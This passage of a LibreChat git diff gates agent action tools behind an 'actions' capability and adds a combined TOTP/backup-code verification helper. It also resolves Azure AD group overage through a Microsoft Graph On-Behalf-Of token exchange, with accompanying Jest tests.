`${sig.name}${actionDelimiter}${legacyNormalized}`; + if (!normalizedToolNames.has(toolName) && !normalizedToolNames.has(legacyToolName)) { continue; } @@ -765,6 +794,7 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to toolContextMap, toolDefinitions, hasDeferredTools, + actionsEnabled, }; } @@ -808,14 +838,7 @@ async function loadAgentTools({ } const appConfig = req.config; - const endpointsConfig = await getEndpointsConfig(req); - let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []); - /** Edge case: use defined/fallback capabilities when the "agents" endpoint is not enabled */ - if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) { - enabledCapabilities = new Set( - appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities, - ); - } + const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id); const checkCapability = (capability) => { const enabled = enabledCapabilities.has(capability); if (!enabled) { @@ -832,6 +855,7 @@ async function loadAgentTools({ return enabled; }; const areToolsEnabled = checkCapability(AgentCapabilities.tools); + const actionsEnabled = checkCapability(AgentCapabilities.actions); let includesWebSearch = false; const _agentTools = agent.tools?.filter((tool) => { @@ -842,7 +866,9 @@ async function loadAgentTools({ } else if (tool === Tools.web_search) { includesWebSearch = checkCapability(AgentCapabilities.web_search); return includesWebSearch; - } else if (!areToolsEnabled && !tool.includes(actionDelimiter)) { + } else if (tool.includes(actionDelimiter)) { + return actionsEnabled; + } else if (!areToolsEnabled) { return false; } return true; @@ -947,13 +973,15 @@ async function loadAgentTools({ agentTools.push(...additionalTools); - if (!checkCapability(AgentCapabilities.actions)) { + const hasActionTools = _agentTools.some((t) => t.includes(actionDelimiter)); + if (!hasActionTools) { return { 
toolRegistry, userMCPAuthMap, toolContextMap, toolDefinitions, hasDeferredTools, + actionsEnabled, tools: agentTools, }; } @@ -969,19 +997,22 @@ async function loadAgentTools({ toolContextMap, toolDefinitions, hasDeferredTools, + actionsEnabled, tools: agentTools, }; } - // Process each action set once (validate spec, decrypt metadata) const processedActionSets = new Map(); - const domainMap = new Map(); + const domainLookupMap = new Map(); for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); - domainMap.set(domain, action); + domainLookupMap.set(domain, domain); - // Check if domain is allowed (do this once per action set) + const legacyDomain = legacyDomainEncode(action.metadata.domain); + if (legacyDomain !== domain) { + domainLookupMap.set(legacyDomain, domain); + } const isDomainAllowed = await isActionDomainAllowed( action.metadata.domain, appConfig?.actions?.allowedDomains, @@ -1043,11 +1074,12 @@ async function loadAgentTools({ continue; } - // Find the matching domain for this tool let currentDomain = ''; - for (const domain of domainMap.keys()) { - if (toolName.includes(domain)) { - currentDomain = domain; + let matchedKey = ''; + for (const [key, canonical] of domainLookupMap.entries()) { + if (toolName.includes(key)) { + currentDomain = canonical; + matchedKey = key; break; } } @@ -1058,7 +1090,7 @@ async function loadAgentTools({ const { action, encrypted, zodSchemas, requestBuilders, functionSignatures } = processedActionSets.get(currentDomain); - const functionName = toolName.replace(`${actionDelimiter}${currentDomain}`, ''); + const functionName = toolName.replace(`${actionDelimiter}${matchedKey}`, ''); const functionSig = functionSignatures.find((sig) => sig.name === functionName); const requestBuilder = requestBuilders[functionName]; const zodSchema = zodSchemas[functionName]; @@ -1101,6 +1133,7 @@ async function loadAgentTools({ userMCPAuthMap, toolDefinitions, hasDeferredTools, + actionsEnabled, 
 tools: agentTools, }; } @@ -1118,9 +1151,11 @@ async function loadAgentTools({ * @param {AbortSignal} [params.signal] - Abort signal * @param {Object} params.agent - The agent object * @param {string[]} params.toolNames - Names of tools to load + * @param {Map} [params.toolRegistry] - Tool registry * @param {Record<string, Record<string, string>>} [params.userMCPAuthMap] - User MCP auth map * @param {Object} [params.tool_resources] - Tool resources * @param {string|null} [params.streamId] - Stream ID for web search callbacks + * @param {boolean} [params.actionsEnabled] - Whether the actions capability is enabled * @returns {Promise<{ loadedTools: Array, configurable: Object }>} */ async function loadToolsForExecution({ @@ -1133,11 +1168,17 @@ async function loadToolsForExecution({ userMCPAuthMap, tool_resources, streamId = null, + actionsEnabled, }) { const appConfig = req.config; const allLoadedTools = []; const configurable = { userMCPAuthMap }; + if (actionsEnabled === undefined) { + const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent?.id); + actionsEnabled = enabledCapabilities.has(AgentCapabilities.actions); + } + const isToolSearch = toolNames.includes(AgentConstants.TOOL_SEARCH); const isPTC = toolNames.includes(AgentConstants.PROGRAMMATIC_TOOL_CALLING); @@ -1194,7 +1235,6 @@ async function loadToolsForExecution({ const actionToolNames = allToolNamesToLoad.filter((name) => name.includes(actionDelimiter)); const regularToolNames = allToolNamesToLoad.filter((name) => !name.includes(actionDelimiter)); - /** @type {Record} */ if (regularToolNames.length > 0) { const includesWebSearch = regularToolNames.includes(Tools.web_search); const webSearchCallbacks = includesWebSearch ? 
createOnSearchResults(res, streamId) : undefined; @@ -1225,7 +1265,7 @@ async function loadToolsForExecution({ } } - if (actionToolNames.length > 0 && agent) { + if (actionToolNames.length > 0 && agent && actionsEnabled) { const actionTools = await loadActionToolsForExecution({ req, res, @@ -1235,6 +1275,11 @@ async function loadToolsForExecution({ actionToolNames, }); allLoadedTools.push(...actionTools); + } else if (actionToolNames.length > 0 && agent && !actionsEnabled) { + logger.warn( + `[loadToolsForExecution] Capability "${AgentCapabilities.actions}" disabled. ` + + `Skipping action tool execution. User: ${req.user.id} | Agent: ${agent.id} | Tools: ${actionToolNames.join(', ')}`, + ); } if (isPTC && allLoadedTools.length > 0) { @@ -1280,12 +1325,20 @@ async function loadActionToolsForExecution({ } const processedActionSets = new Map(); - const domainMap = new Map(); + /** Maps both new and legacy normalized domains to their canonical (new) domain key */ + const normalizedToDomain = new Map(); const allowedDomains = appConfig?.actions?.allowedDomains; for (const action of actionSets) { const domain = await domainParser(action.metadata.domain, true); - domainMap.set(domain, action); + const normalizedDomain = domain.replace(domainSeparatorRegex, '_'); + normalizedToDomain.set(normalizedDomain, domain); + + const legacyDomain = legacyDomainEncode(action.metadata.domain); + const legacyNormalized = legacyDomain.replace(domainSeparatorRegex, '_'); + if (legacyNormalized !== normalizedDomain) { + normalizedToDomain.set(legacyNormalized, domain); + } const isDomainAllowed = await isActionDomainAllowed(action.metadata.domain, allowedDomains); if (!isDomainAllowed) { @@ -1334,16 +1387,15 @@ async function loadActionToolsForExecution({ functionSignatures, zodSchemas, encrypted, + legacyNormalized, }); } - const domainSeparatorRegex = new RegExp(actionDomainSeparator, 'g'); for (const toolName of actionToolNames) { let currentDomain = ''; - for (const domain of 
domainMap.keys()) { - const normalizedDomain = domain.replace(domainSeparatorRegex, '_'); + for (const [normalizedDomain, canonicalDomain] of normalizedToDomain.entries()) { if (toolName.includes(normalizedDomain)) { - currentDomain = domain; + currentDomain = canonicalDomain; break; } } @@ -1352,7 +1404,7 @@ async function loadActionToolsForExecution({ continue; } - const { action, encrypted, zodSchemas, requestBuilders, functionSignatures } = + const { action, encrypted, zodSchemas, requestBuilders, functionSignatures, legacyNormalized } = processedActionSets.get(currentDomain); const normalizedDomain = currentDomain.replace(domainSeparatorRegex, '_'); const functionName = toolName.replace(`${actionDelimiter}${normalizedDomain}`, ''); @@ -1361,6 +1413,25 @@ async function loadActionToolsForExecution({ const zodSchema = zodSchemas[functionName]; if (!requestBuilder) { + const legacyFnName = toolName.replace(`${actionDelimiter}${legacyNormalized}`, ''); + if (legacyFnName !== toolName && requestBuilders[legacyFnName]) { + const legacyTool = await createActionTool({ + userId: req.user.id, + res, + action, + streamId, + encrypted, + requestBuilder: requestBuilders[legacyFnName], + zodSchema: zodSchemas[legacyFnName], + name: toolName, + description: + functionSignatures.find((sig) => sig.name === legacyFnName)?.description ?? 
'', + useSSRFProtection: !Array.isArray(allowedDomains) || allowedDomains.length === 0, + }); + if (legacyTool) { + loadedActionTools.push(legacyTool); + } + } continue; } @@ -1395,4 +1466,5 @@ module.exports = { loadAgentTools, loadToolsForExecution, processRequiredActions, + resolveAgentCapabilities, }; diff --git a/api/server/services/__tests__/ToolService.spec.js b/api/server/services/__tests__/ToolService.spec.js index c44298b09c..a468a88eb3 100644 --- a/api/server/services/__tests__/ToolService.spec.js +++ b/api/server/services/__tests__/ToolService.spec.js @@ -1,19 +1,304 @@ const { + Tools, Constants, + EModelEndpoint, + actionDelimiter, AgentCapabilities, defaultAgentCapabilities, } = require('librechat-data-provider'); -/** - * Tests for ToolService capability checking logic. - * The actual loadAgentTools function has many dependencies, so we test - * the capability checking logic in isolation. - */ -describe('ToolService - Capability Checking', () => { +const mockGetEndpointsConfig = jest.fn(); +const mockGetMCPServerTools = jest.fn(); +const mockGetCachedTools = jest.fn(); +jest.mock('~/server/services/Config', () => ({ + getEndpointsConfig: (...args) => mockGetEndpointsConfig(...args), + getMCPServerTools: (...args) => mockGetMCPServerTools(...args), + getCachedTools: (...args) => mockGetCachedTools(...args), +})); + +const mockLoadToolDefinitions = jest.fn(); +const mockGetUserMCPAuthMap = jest.fn(); +jest.mock('@librechat/api', () => ({ + ...jest.requireActual('@librechat/api'), + loadToolDefinitions: (...args) => mockLoadToolDefinitions(...args), + getUserMCPAuthMap: (...args) => mockGetUserMCPAuthMap(...args), +})); + +const mockLoadToolsUtil = jest.fn(); +jest.mock('~/app/clients/tools/util', () => ({ + loadTools: (...args) => mockLoadToolsUtil(...args), +})); + +const mockLoadActionSets = jest.fn(); +jest.mock('~/server/services/Tools/credentials', () => ({ + loadAuthValues: jest.fn().mockResolvedValue({}), +})); 
+jest.mock('~/server/services/Tools/search', () => ({ + createOnSearchResults: jest.fn(), +})); +jest.mock('~/server/services/Tools/mcp', () => ({ + reinitMCPServer: jest.fn(), +})); +jest.mock('~/server/services/Files/process', () => ({ + processFileURL: jest.fn(), + uploadImageBuffer: jest.fn(), +})); +jest.mock('~/app/clients/tools/util/fileSearch', () => ({ + primeFiles: jest.fn().mockResolvedValue({}), +})); +jest.mock('~/server/services/Files/Code/process', () => ({ + primeFiles: jest.fn().mockResolvedValue({}), +})); +jest.mock('../ActionService', () => ({ + loadActionSets: (...args) => mockLoadActionSets(...args), + decryptMetadata: jest.fn(), + createActionTool: jest.fn(), + domainParser: jest.fn(), +})); +jest.mock('~/server/services/Threads', () => ({ + recordUsage: jest.fn(), +})); +jest.mock('~/models', () => ({ + findPluginAuthsByKeys: jest.fn(), +})); +jest.mock('~/config', () => ({ + getFlowStateManager: jest.fn(() => ({})), +})); +jest.mock('~/cache', () => ({ + getLogStores: jest.fn(() => ({})), +})); + +const { + loadAgentTools, + loadToolsForExecution, + resolveAgentCapabilities, +} = require('../ToolService'); + +function createMockReq(capabilities) { + return { + user: { id: 'user_123' }, + config: { + endpoints: { + [EModelEndpoint.agents]: { + capabilities, + }, + }, + }, + }; +} + +function createEndpointsConfig(capabilities) { + return { + [EModelEndpoint.agents]: { capabilities }, + }; +} + +describe('ToolService - Action Capability Gating', () => { + beforeEach(() => { + jest.clearAllMocks(); + mockLoadToolDefinitions.mockResolvedValue({ + toolDefinitions: [], + toolRegistry: new Map(), + hasDeferredTools: false, + }); + mockLoadToolsUtil.mockResolvedValue({ loadedTools: [], toolContextMap: {} }); + mockLoadActionSets.mockResolvedValue([]); + }); + + describe('resolveAgentCapabilities', () => { + it('should return capabilities from endpoints config', async () => { + const capabilities = [AgentCapabilities.tools, 
AgentCapabilities.actions]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + const result = await resolveAgentCapabilities(req, req.config, 'agent_123'); + + expect(result).toBeInstanceOf(Set); + expect(result.has(AgentCapabilities.tools)).toBe(true); + expect(result.has(AgentCapabilities.actions)).toBe(true); + expect(result.has(AgentCapabilities.web_search)).toBe(false); + }); + + it('should fall back to default capabilities for ephemeral agents with empty config', async () => { + const req = createMockReq(defaultAgentCapabilities); + mockGetEndpointsConfig.mockResolvedValue({}); + + const result = await resolveAgentCapabilities(req, req.config, Constants.EPHEMERAL_AGENT_ID); + + for (const cap of defaultAgentCapabilities) { + expect(result.has(cap)).toBe(true); + } + }); + + it('should return empty set when no capabilities and not ephemeral', async () => { + const req = createMockReq([]); + mockGetEndpointsConfig.mockResolvedValue({}); + + const result = await resolveAgentCapabilities(req, req.config, 'agent_123'); + + expect(result.size).toBe(0); + }); + }); + + describe('loadAgentTools (definitionsOnly=true) — action tool filtering', () => { + const actionToolName = `get_weather${actionDelimiter}api_example_com`; + const regularTool = 'calculator'; + + it('should exclude action tools from definitions when actions capability is disabled', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: true, + }); + + expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1); + const [callArgs] = mockLoadToolDefinitions.mock.calls[0]; + expect(callArgs.tools).toContain(regularTool); + 
expect(callArgs.tools).not.toContain(actionToolName); + }); + + it('should include action tools in definitions when actions capability is enabled', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: true, + }); + + expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1); + const [callArgs] = mockLoadToolDefinitions.mock.calls[0]; + expect(callArgs.tools).toContain(regularTool); + expect(callArgs.tools).toContain(actionToolName); + }); + + it('should return actionsEnabled in the result', async () => { + const capabilities = [AgentCapabilities.tools]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + const result = await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool] }, + definitionsOnly: true, + }); + + expect(result.actionsEnabled).toBe(false); + }); + }); + + describe('loadAgentTools (definitionsOnly=false) — action tool filtering', () => { + const actionToolName = `get_weather${actionDelimiter}api_example_com`; + const regularTool = 'calculator'; + + it('should not load action sets when actions capability is disabled', async () => { + const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: false, + }); + + expect(mockLoadActionSets).not.toHaveBeenCalled(); + }); + + it('should load action sets when actions capability is enabled and action tools present', async () => { + const 
capabilities = [AgentCapabilities.tools, AgentCapabilities.actions]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadAgentTools({ + req, + res: {}, + agent: { id: 'agent_123', tools: [regularTool, actionToolName] }, + definitionsOnly: false, + }); + + expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' }); + }); + }); + + describe('loadToolsForExecution — action tool gating', () => { + const actionToolName = `get_weather${actionDelimiter}api_example_com`; + const regularTool = Tools.web_search; + + it('should skip action tool loading when actionsEnabled=false', async () => { + const req = createMockReq([]); + req.config = {}; + + const result = await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [regularTool, actionToolName], + actionsEnabled: false, + }); + + expect(mockLoadActionSets).not.toHaveBeenCalled(); + expect(result.loadedTools).toBeDefined(); + }); + + it('should load action tools when actionsEnabled=true', async () => { + const req = createMockReq([AgentCapabilities.actions]); + req.config = {}; + + await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [actionToolName], + actionsEnabled: true, + }); + + expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' }); + }); + + it('should resolve actionsEnabled from capabilities when not explicitly provided', async () => { + const capabilities = [AgentCapabilities.tools]; + const req = createMockReq(capabilities); + mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities)); + + await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [actionToolName], + }); + + expect(mockGetEndpointsConfig).toHaveBeenCalled(); + expect(mockLoadActionSets).not.toHaveBeenCalled(); + }); + + it('should not call loadActionSets when there are no action tools', async () => { + 
const req = createMockReq([AgentCapabilities.actions]); + req.config = {}; + + await loadToolsForExecution({ + req, + res: {}, + agent: { id: 'agent_123' }, + toolNames: [regularTool], + actionsEnabled: true, + }); + + expect(mockLoadActionSets).not.toHaveBeenCalled(); + }); + }); + describe('checkCapability logic', () => { - /** - * Simulates the checkCapability function from loadAgentTools - */ const createCheckCapability = (enabledCapabilities, logger = { warn: jest.fn() }) => { return (capability) => { const enabled = enabledCapabilities.has(capability); @@ -124,10 +409,6 @@ describe('ToolService - Capability Checking', () => { }); describe('userMCPAuthMap gating', () => { - /** - * Simulates the guard condition used in both loadToolDefinitionsWrapper - * and loadAgentTools to decide whether getUserMCPAuthMap should be called. - */ const shouldFetchMCPAuth = (tools) => tools?.some((t) => t.includes(Constants.mcp_delimiter)) ?? false; @@ -178,20 +459,17 @@ describe('ToolService - Capability Checking', () => { return (capability) => enabledCapabilities.has(capability); }; - // When deferred_tools is in capabilities const withDeferred = new Set([AgentCapabilities.deferred_tools, AgentCapabilities.tools]); const checkWithDeferred = createCheckCapability(withDeferred); expect(checkWithDeferred(AgentCapabilities.deferred_tools)).toBe(true); - // When deferred_tools is NOT in capabilities const withoutDeferred = new Set([AgentCapabilities.tools, AgentCapabilities.actions]); const checkWithoutDeferred = createCheckCapability(withoutDeferred); expect(checkWithoutDeferred(AgentCapabilities.deferred_tools)).toBe(false); }); it('should use defaultAgentCapabilities when no capabilities configured', () => { - // Simulates the fallback behavior in loadAgentTools - const endpointsConfig = {}; // No capabilities configured + const endpointsConfig = {}; const enabledCapabilities = new Set( endpointsConfig?.capabilities ?? 
defaultAgentCapabilities, ); diff --git a/api/server/services/twoFactorService.js b/api/server/services/twoFactorService.js index cce24e2322..313c557133 100644 --- a/api/server/services/twoFactorService.js +++ b/api/server/services/twoFactorService.js @@ -153,9 +153,11 @@ const generateBackupCodes = async (count = 10) => { * @param {Object} params * @param {Object} params.user * @param {string} params.backupCode + * @param {boolean} [params.persist=true] - Whether to persist the used-mark to the database. + * Pass `false` when the caller will immediately overwrite `backupCodes` (e.g. re-enrollment). * @returns {Promise} */ -const verifyBackupCode = async ({ user, backupCode }) => { +const verifyBackupCode = async ({ user, backupCode, persist = true }) => { if (!backupCode || !user || !Array.isArray(user.backupCodes)) { return false; } @@ -165,17 +167,50 @@ const verifyBackupCode = async ({ user, backupCode }) => { (codeObj) => codeObj.codeHash === hashedInput && !codeObj.used, ); - if (matchingCode) { + if (!matchingCode) { + return false; + } + + if (persist) { const updatedBackupCodes = user.backupCodes.map((codeObj) => codeObj.codeHash === hashedInput && !codeObj.used ? { ...codeObj, used: true, usedAt: new Date() } : codeObj, ); - // Update the user record with the marked backup code. await updateUser(user._id, { backupCodes: updatedBackupCodes }); - return true; } - return false; + return true; +}; + +/** + * Verifies a user's identity via TOTP token or backup code. + * @param {Object} params + * @param {Object} params.user - The user document (must include totpSecret and backupCodes). + * @param {string} [params.token] - A 6-digit TOTP token. + * @param {string} [params.backupCode] - An 8-character backup code. + * @param {boolean} [params.persistBackupUse=true] - Whether to mark the backup code as used in the DB. 
+ * @returns {Promise<{ verified: boolean, status?: number, message?: string }>} + */ +const verifyOTPOrBackupCode = async ({ user, token, backupCode, persistBackupUse = true }) => { + if (!token && !backupCode) { + return { verified: false, status: 400 }; + } + + if (token) { + const secret = await getTOTPSecret(user.totpSecret); + if (!secret) { + return { verified: false, status: 400, message: '2FA secret is missing or corrupted' }; + } + const ok = await verifyTOTP(secret, token); + return ok + ? { verified: true } + : { verified: false, status: 401, message: 'Invalid token or backup code' }; + } + + const ok = await verifyBackupCode({ user, backupCode, persist: persistBackupUse }); + return ok + ? { verified: true } + : { verified: false, status: 401, message: 'Invalid token or backup code' }; }; /** @@ -213,11 +248,12 @@ const generate2FATempToken = (userId) => { }; module.exports = { - generateTOTPSecret, - generateTOTP, - verifyTOTP, + verifyOTPOrBackupCode, + generate2FATempToken, generateBackupCodes, + generateTOTPSecret, verifyBackupCode, getTOTPSecret, - generate2FATempToken, + generateTOTP, + verifyTOTP, }; diff --git a/api/server/utils/import/fork.js b/api/server/utils/import/fork.js index c4ce8cb5d4..f896de378c 100644 --- a/api/server/utils/import/fork.js +++ b/api/server/utils/import/fork.js @@ -358,16 +358,15 @@ function splitAtTargetLevel(messages, targetMessageId) { * @param {object} params - The parameters for duplicating the conversation. * @param {string} params.userId - The ID of the user duplicating the conversation. * @param {string} params.conversationId - The ID of the conversation to duplicate. + * @param {string} [params.title] - Optional title override for the duplicate. * @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages. 
*/ -async function duplicateConversation({ userId, conversationId }) { - // Get original conversation +async function duplicateConversation({ userId, conversationId, title }) { const originalConvo = await getConvo(userId, conversationId); if (!originalConvo) { throw new Error('Conversation not found'); } - // Get original messages const originalMessages = await getMessages({ user: userId, conversationId, @@ -383,14 +382,11 @@ async function duplicateConversation({ userId, conversationId }) { cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder); - const result = importBatchBuilder.finishConversation( - originalConvo.title, - new Date(), - originalConvo, - ); + const duplicateTitle = title || originalConvo.title; + const result = importBatchBuilder.finishConversation(duplicateTitle, new Date(), originalConvo); await importBatchBuilder.saveBatch(); logger.debug( - `user: ${userId} | New conversation "${originalConvo.title}" duplicated from conversation ID ${conversationId}`, + `user: ${userId} | New conversation "${duplicateTitle}" duplicated from conversation ID ${conversationId}`, ); const conversation = await getConvo(userId, result.conversation.conversationId); diff --git a/api/server/utils/import/importConversations.js b/api/server/utils/import/importConversations.js index d9e4d4332d..e56176c609 100644 --- a/api/server/utils/import/importConversations.js +++ b/api/server/utils/import/importConversations.js @@ -1,7 +1,10 @@ const fs = require('fs').promises; +const { resolveImportMaxFileSize } = require('@librechat/api'); const { logger } = require('@librechat/data-schemas'); const { getImporter } = require('./importers'); +const maxFileSize = resolveImportMaxFileSize(); + /** * Job definition for importing a conversation. * @param {{ filepath, requestUserId }} job - The job object. 
@@ -11,11 +14,10 @@ const importConversations = async (job) => { try { logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`); - /* error if file is too large */ const fileInfo = await fs.stat(filepath); - if (fileInfo.size > process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES) { + if (fileInfo.size > maxFileSize) { throw new Error( - `File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES} bytes.`, + `File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${maxFileSize} bytes.`, ); } diff --git a/api/strategies/openidStrategy.js b/api/strategies/openidStrategy.js index 0ebdcb04e1..7c43358297 100644 --- a/api/strategies/openidStrategy.js +++ b/api/strategies/openidStrategy.js @@ -315,24 +315,85 @@ function convertToUsername(input, defaultValue = '') { return defaultValue; } +/** + * Exchange the access token for a Graph-scoped token using the On-Behalf-Of (OBO) flow. + * + * The original access token has the app's own audience (api://), which Microsoft Graph + * rejects. This exchange produces a token with audience https://graph.microsoft.com and the + * minimum delegated scope (User.Read) required by /me/getMemberObjects. + * + * Uses a dedicated cache key (`${sub}:overage`) to avoid collisions with other OBO exchanges + * in the codebase (userinfo, Graph principal search). 
+ * + * @param {string} accessToken - The original access token from the OpenID tokenset + * @param {string} sub - The subject identifier for cache keying + * @returns {Promise} A Graph-scoped access token + * @see https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-on-behalf-of-flow + */ +async function exchangeTokenForOverage(accessToken, sub) { + if (!openidConfig) { + throw new Error('[openidStrategy] OpenID config not initialized; cannot exchange OBO token'); + } + + const tokensCache = getLogStores(CacheKeys.OPENID_EXCHANGED_TOKENS); + const cacheKey = `${sub}:overage`; + + const cached = await tokensCache.get(cacheKey); + if (cached?.access_token) { + logger.debug('[openidStrategy] Using cached Graph token for overage resolution'); + return cached.access_token; + } + + const grantResponse = await client.genericGrantRequest( + openidConfig, + 'urn:ietf:params:oauth:grant-type:jwt-bearer', + { + scope: 'https://graph.microsoft.com/User.Read', + assertion: accessToken, + requested_token_use: 'on_behalf_of', + }, + ); + + if (!grantResponse.access_token) { + throw new Error( + '[openidStrategy] OBO exchange succeeded but returned no access_token; cannot call Graph API', + ); + } + + const ttlMs = + Number.isFinite(grantResponse.expires_in) && grantResponse.expires_in > 0 + ? grantResponse.expires_in * 1000 + : 3600 * 1000; + + await tokensCache.set(cacheKey, { access_token: grantResponse.access_token }, ttlMs); + + return grantResponse.access_token; +} + /** * Resolve Azure AD groups when group overage is in effect (groups moved to _claim_names/_claim_sources). * * NOTE: Microsoft recommends treating _claim_names/_claim_sources as a signal only and using Microsoft Graph * to resolve group membership instead of calling the endpoint in _claim_sources directly. 
* - * @param {string} accessToken - Access token with Microsoft Graph permissions + * Before calling Graph, the access token is exchanged via the OBO flow to obtain a token with the + * correct audience (https://graph.microsoft.com) and User.Read scope. + * + * @param {string} accessToken - Access token from the OpenID tokenset (app audience) + * @param {string} sub - The subject identifier of the user (for OBO exchange and cache keying) * @returns {Promise} Resolved group IDs or null on failure * @see https://learn.microsoft.com/en-us/entra/identity-platform/access-token-claims-reference#groups-overage-claim * @see https://learn.microsoft.com/en-us/graph/api/directoryobject-getmemberobjects */ -async function resolveGroupsFromOverage(accessToken) { +async function resolveGroupsFromOverage(accessToken, sub) { try { if (!accessToken) { logger.error('[openidStrategy] Access token missing; cannot resolve group overage'); return null; } + const graphToken = await exchangeTokenForOverage(accessToken, sub); + // Use /me/getMemberObjects so least-privileged delegated permission User.Read is sufficient // when resolving the signed-in user's group membership. const url = 'https://graph.microsoft.com/v1.0/me/getMemberObjects'; @@ -344,7 +405,7 @@ async function resolveGroupsFromOverage(accessToken) { const fetchOptions = { method: 'POST', headers: { - Authorization: `Bearer ${accessToken}`, + Authorization: `Bearer ${graphToken}`, 'Content-Type': 'application/json', }, body: JSON.stringify({ securityEnabledOnly: false }), @@ -364,6 +425,7 @@ async function resolveGroupsFromOverage(accessToken) { } const data = await response.json(); + const values = Array.isArray(data?.value) ? 
data.value : null; if (!values) { logger.error( @@ -432,6 +494,8 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) { const fullName = getFullName(userinfo); const requiredRole = process.env.OPENID_REQUIRED_ROLE; + let resolvedOverageGroups = null; + if (requiredRole) { const requiredRoles = requiredRole .split(',') @@ -451,19 +515,21 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) { // Handle Azure AD group overage for ID token groups: when hasgroups or _claim_* indicate overage, // resolve groups via Microsoft Graph instead of relying on token group values. + const hasOverage = + decodedToken?.hasgroups || + (decodedToken?._claim_names?.groups && + decodedToken?._claim_sources?.[decodedToken._claim_names.groups]); + if ( - !Array.isArray(roles) && - typeof roles !== 'string' && requiredRoleTokenKind === 'id' && requiredRoleParameterPath === 'groups' && decodedToken && - (decodedToken.hasgroups || - (decodedToken._claim_names?.groups && - decodedToken._claim_sources?.[decodedToken._claim_names.groups])) + hasOverage ) { - const overageGroups = await resolveGroupsFromOverage(tokenset.access_token); + const overageGroups = await resolveGroupsFromOverage(tokenset.access_token, claims.sub); if (overageGroups) { roles = overageGroups; + resolvedOverageGroups = overageGroups; } } @@ -550,7 +616,25 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) { throw new Error('Invalid admin role token kind'); } - const adminRoles = get(adminRoleObject, adminRoleParameterPath); + let adminRoles = get(adminRoleObject, adminRoleParameterPath); + + // Handle Azure AD group overage for admin role when using ID token groups + if (adminRoleTokenKind === 'id' && adminRoleParameterPath === 'groups' && adminRoleObject) { + const hasAdminOverage = + adminRoleObject.hasgroups || + (adminRoleObject._claim_names?.groups && + adminRoleObject._claim_sources?.[adminRoleObject._claim_names.groups]); + + if (hasAdminOverage) { + 
const overageGroups = + resolvedOverageGroups || + (await resolveGroupsFromOverage(tokenset.access_token, claims.sub)); + if (overageGroups) { + adminRoles = overageGroups; + } + } + } + let adminRoleValues = []; if (Array.isArray(adminRoles)) { adminRoleValues = adminRoles; diff --git a/api/strategies/openidStrategy.spec.js b/api/strategies/openidStrategy.spec.js index 485b77829e..16fa548a59 100644 --- a/api/strategies/openidStrategy.spec.js +++ b/api/strategies/openidStrategy.spec.js @@ -64,6 +64,10 @@ jest.mock('openid-client', () => { // Only return additional properties, but don't override any claims return Promise.resolve({}); }), + genericGrantRequest: jest.fn().mockResolvedValue({ + access_token: 'exchanged_graph_token', + expires_in: 3600, + }), customFetch: Symbol('customFetch'), }; }); @@ -730,7 +734,7 @@ describe('setupOpenId', () => { expect.objectContaining({ method: 'POST', headers: expect.objectContaining({ - Authorization: `Bearer ${tokenset.access_token}`, + Authorization: 'Bearer exchanged_graph_token', }), }), ); @@ -745,6 +749,313 @@ describe('setupOpenId', () => { ); }); + describe('OBO token exchange for overage', () => { + it('exchanges access token via OBO before calling Graph API', async () => { + const openidClient = require('openid-client'); + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required'] }), + }); + + await validate(tokenset); + + 